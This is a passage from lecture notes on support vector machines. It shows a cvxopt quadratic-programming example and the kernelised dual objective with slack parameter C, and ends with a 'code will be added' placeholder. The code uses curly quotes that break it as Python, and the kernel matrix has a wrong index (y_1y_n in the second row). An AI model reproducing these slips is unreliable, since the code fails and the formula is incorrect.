\boldsymbol{h} = \begin{bmatrix}0 \\ 0\\ -15 \\ 100 \\ 80\end{bmatrix}.
$$
Since we don't have any equalities the matrix $\boldsymbol{A}$ is set to zero
The following code solves the equations for us
# Import the necessary packages
import numpy
from cvxopt import matrix
from cvxopt import solvers
P = matrix(numpy.diag([1,0]), tc=’d’)
q = matrix(numpy.array([3,4]), tc=’d’)
G = matrix(numpy.array([[-1,0],[0,-1],[-1,-3],[2,5],[3,4]]), tc=’d’)
h = matrix(numpy.array([0,0,-15,100,80]), tc=’d’)
# Construct the QP, invoke solver
sol = solvers.qp(P,q,G,h)
# Extract optimal value and solution
sol[’x’]
sol[’primal objective’]
We are now ready to return to our setup of the optmization problem for a more realistic case. Introducing the **slack** parameter $C$ we have
$$
\frac{1}{2} \boldsymbol{\lambda}^T\begin{bmatrix} y_1y_1K(\boldsymbol{x}_1,\boldsymbol{x}_1) & y_1y_2K(\boldsymbol{x}_1,\boldsymbol{x}_2) & \dots & \dots & y_1y_nK(\boldsymbol{x}_1,\boldsymbol{x}_n) \\
y_2y_1K(\boldsymbol{x}_2,\boldsymbol{x}_1) & y_2y_2K(\boldsymbol{x}_2,\boldsymbol{x}_2) & \dots & \dots & y_1y_nK(\boldsymbol{x}_2,\boldsymbol{x}_n) \\
\dots & \dots & \dots & \dots & \dots \\
\dots & \dots & \dots & \dots & \dots \\
y_ny_1K(\boldsymbol{x}_n,\boldsymbol{x}_1) & y_ny_2K(\boldsymbol{x}_n\boldsymbol{x}_2) & \dots & \dots & y_ny_nK(\boldsymbol{x}_n,\boldsymbol{x}_n) \\
\end{bmatrix}\boldsymbol{\lambda}-\mathbb{I}\boldsymbol{\lambda},
$$
subject to $\boldsymbol{y}^T\boldsymbol{\lambda}=0$. Here we defined the vectors $\boldsymbol{\lambda} =[\lambda_1,\lambda_2,\dots,\lambda_n]$ and
$\boldsymbol{y}=[y_1,y_2,\dots,y_n]$.
With the slack constants this leads to the additional constraint $0\leq \lambda_i \leq C$.
**code will be added** |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.